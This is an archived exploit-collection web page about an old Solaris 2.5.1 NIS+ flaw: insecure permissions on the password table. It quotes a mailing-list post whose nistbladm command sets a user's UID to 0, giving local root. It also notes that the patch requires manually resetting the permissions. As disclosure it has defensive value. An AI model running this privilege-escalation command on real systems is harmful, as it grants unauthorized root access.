Insecure Solaris default nissetup password table permissions!
The nissetup.sh program for setting up NIS+ databases leaves insecure permissions on the password table. This allows you to, for example, use nistbladm to change your UID!
Unpatched Solaris 2.5.1 systems (possibly earlier versions of Solaris).
10 February 1996
Here is an anonymous posting reminding us of the problem. Also, Casper Dik (casper@HOLLAND.SUN.COM) mentioned that just installing the Solaris patch doesn't fix the problem. You need to manually reset the bad permissions. How many people do you think forgot to do that?
Date: Fri, 30 May 1997 19:44:40 +0200
From: Anonymous <nobody@REPLAY.COM>
Subject: NIS+, Solaris 2.5.1
Ever tried to change your NIS+ password with
the "nistbladm" command ? Works fine, but you
can also change your UID ....
$ nistbladm -e uid=0 '[name=alice]',passwd.org_dir
$ niscat passwd.org_dir | grep alice
. . . . . . . . . . .
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces: